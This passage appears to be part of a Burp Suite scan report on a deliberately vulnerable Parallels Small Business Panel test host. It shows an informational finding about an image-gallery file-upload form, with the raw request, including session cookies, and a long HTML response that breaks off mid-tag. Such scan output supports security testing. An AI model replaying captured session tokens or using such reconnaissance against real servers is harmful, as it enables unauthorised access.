<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Back" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Pages');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_l.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_back_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Back</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_r.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Preview" style="cursor: pointer;" onclick="sbNavigationObject.setViewParam('preview','show');sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Category/Add');sbNavigationObject.unsetViewParam('preview');"><tr>
<td style="width:0px;"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_preview_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Preview</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" value="Forward" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Publish');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_l.gif" border="0"></td>
<td background="/skins/WinXPReloadedCompact/images/go_bg.gif" style="padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_next_bullet.gif" border="0"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Next</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_r.gif" border="0"></td>
</tr></table></td>
</tr></table></td>
</tr></table></td></tr></table></td></tr>
</table>
</form>
</body>
</html>

6.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Edit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/ImageGallery/Category/Edit

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /Wizard/Edit/Modules/ImageGallery/Category/Edit?id=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:59:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="/skins/common.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/WinXPReloadedCompact/style.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/style_ext.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link rel="shortcut icon" href="/favicon.ico?5.0.0.2009110318">
<script type="text/javascript" src="/js/externals/prototype.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/externals/scriptaculous/scriptaculous.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Console.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/util.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/preloader.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Cookie.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/common.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/validator.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/SbAjaxRequest.js?5.0.0.2009110318"></script><style type="text/css">img{ behavior:url('/images/pngbehavior.htc?5.0.0.2009110318'); }</style>
<title>Edit -
       Parallels Small Business Panel</title>
</head>
<body onload="ProcessOnloadActions();">
<script type="text/javascript">
                   if ('1' == '') {
                       Sb.Console.enable();

                       
                   }
                                   
                   Sb.Cookie.set('testCookie', 'test', '', '/');

                   if ('test' != Sb.Cookie.get('testCookie')) {
                       document.location.href = "/NoCookies";
                   }

                   // define global variables
                   sbSkinPath = '/skins/WinXPReloadedCompact';
                   sbBrowserEngine = 'MSIE';
                   sbBaseUrl = '';
                   sbVersion = '5.0.0';
                   sbBuild = '2009110318';
               </script><script src="/js/locale.js?5.0.0.2009110318" type="text/javascript"></script><script type="text/javascript" language="javascript">
               SbAppendLocaleKey('HIDE-SITE-MAP', 'Hide Site Map');
           
               SbAppendLocaleKey('SHOW-SITE-MAP', 'Show Site Map');
           
               SbAppendLocaleKey('EMPTY-PAGE-TITLE', 'Please provide the page title.');
           
               SbAppendLocaleKey('EMPTY-PAGE-FILE-NAME', 'Please provide a page file name.');
           
               SbAppendLocaleKey('INVALID-PAGE-FILE-NAME', 'Page file name can contain only Latin characters, digits, dashes, and underscores.');
           
               SbAppendLocaleKey('DUPLICATE-PAGE-FILE-NAME', 'Page file name must be unique within each site structure. Also, you cannot name a page \'index\' because it is a reserved name.');
           
               SbAppendLocaleKey('SELECT-FOR-DELETE', 'Please select at least one element.');
           
               SbAppendLocaleKey('SURE-TO-DELETE', 'Selected items will be deleted permanently. Continue?');
           
               SbAppendLocaleKey('EMPTY-CATEGORY-THUMB-WIDTH', 'Please provide a value for the Category image width parameter.');
           
               SbAppendLocaleKey('NOT-INT-CATEGORY-THUMB-WIDTH', 'Invalid value of the Category image width parameter. Please enter an integer number.');
           
               SbAppendLocaleKey('CATEGORY-MAX-THUMB-WIDTH', 'The maximum allowed value for the Category image width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGE-THUMB-WIDTH', 'Please provide a value for the Image thumb width parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGE-THUMB-WIDTH', 'Invalid value of the Image thumb width parameter. It must be an integer number.');
           
               SbAppendLocaleKey('IMAGE-MAX-THUMB-WIDTH', 'The maximum allowed value for the Image thumb width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGE-THUMB-HEIGHT', 'Please provide a value for the Image thumb height parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGE-THUMB-HEIGHT', 'Invalid value of the Image thumb height parameter. It must be an integer number.');
           
               SbAppendLocaleKey('IMAGE-MAX-HEIGHT-WIDTH', 'The maximum allowed value for the Image thumb height parameter is 1536 (px).');
           
               SbAppendLocaleKey('EMPTY-PREVIEW-THUMB-WIDTH', 'Please provide a value for the Preview thumb width parameter.');
           
               SbAppendLocaleKey('NOT-INT-PREVIEW-THUMB-WIDTH', 'Invalid value of the Preview thumb width parameter. It must be an integer number.');
           
               SbAppendLocaleKey('PREVIEW-MAX-WIDTH-WIDTH', 'The maximum allowed value for the Preview thumb width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGES-PER-PAGE', 'Please provide a value for the Images per page parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGES-PER-PAGE', 'Invalid value of the of the Images per page parameter. It must be an integer number.');
           
               SbAppendLocaleKey('EMPTY-CATEGORY-NAME', 'Please provide a value for Name.');
           
               SbAppendLocaleKey('PREVIEW-POPUP-BLOCKED', 'The site preview window was blocked by your browser. To preview the site, please allow pop-up windows for this domain.');
           
               SbAppendLocaleKey('CONTENT-MODIFIED', 'Modified');
           
               SbAppendLocaleKey('AJAX-REQUEST-LOADING', 'Loading...');
           
               SbAppendLocaleKey('AJAX-REQUEST-WAIT', 'Please wait.');
           </script><div id="fullScreenDiv" style="position:absolute; background: #ffffff; filter:alpha(opacity=0); opacity: 0;"></div>
<div id="disablerDiv" style="display: none; filter:alpha(opacity=40); background-color: #FFFFFF; opacity: 0.4;"></div>
<table id="SB_loader_table" cellpadding="0" cellspacing="0" border="0" width="100%" height="100%" style="display:none;z-index:1098;position:absolute;"><tr><td id="SB_loader_td" style="filter:alpha(opacity=40);background-color:#ffffff;-moz-opacity:0.40;"></td></tr></table>
<div id="DIV_DESKTOP" style="width:1%;height:1%;display:none;text-align:center;position:absolute;left:0px;top:0px;z-index:1001;"></div>
<div id="loader" style="height:56px;width:320px;display:none;position:absolute;left:0px;top:0px;z-index:1100;"><table border="0" cellspacing="3" cellpadding="3" width="100%" height="100%" class="sb-preloader-table"><tr>
<td align="center" valign="middle" width="15%"><img id="ImagePreloader" src="/skins/WinXPReloadedCompact/images/loading.gif" style="border-width:0px;"></td>
<td align="left" valign="middle"><span id="LabelPreloader"><strong>Please wait.</strong><br><strong>Loading...</strong></span></td>
</tr></table></div>
<iframe src="/blank.html" id="SB_loader_iframe" name="SB_loader_iframe" frameborder="0" scrolling="no" style="border-width:0;display:none;z-index:1099;position:absolute;height:56px;width:320px;"></iframe><script type="text/javascript" language="javascript"><!--
               var sbPreloader = new SbPreloader();
               
                       sbPreloader.show();
                   
           //--></script><script type="text/javascript">
                   sb_status = null;
               </script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="SbApplyChangesBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="SbApplyChanges" style="width:300px; height:145px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="SbApplyChangesHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="SbApplyChangesTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Apply Changes</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbApplyChangesObject.hide();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="Close dialog" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><table width="80%" cellspacing="0" cellpadding="0" border="0" align="center">
<tr><td colspan="3" style="padding-bottom:10px; padding-left:10px;"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/applychanges.gif" border="0"></td>
<td class="sb-text" style="padding-left:30px;">Apply changes?</td>
</tr></table></td></tr>
<tr>
<td align="center" width="33%" style="padding-right:15px;"><table align="center" onclick="return sbApplyChangesObject.yes(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Yes</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="34%"><table align="center" onclick="return sbApplyChangesObject.no(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">No</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="33%" style="padding-left:15px;"><table align="center" onclick="sbApplyChangesObject.cancel(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Cancel</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr>
</table></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('SbApplyChanges');
       </script><script type="text/javascript" language="javascript" src="/js/apply_changes.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript"><!--
               sbApplyChangesObject = new SB_ApplyChanges('SbApplyChanges');
           //--></script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="StatusDetailedBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="StatusDetailed" style="width: 750px; height: 370px; display: none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="StatusDetailedHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="StatusDetailedTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Detailed status messages</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sb_status.hideDetails();return false;"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td><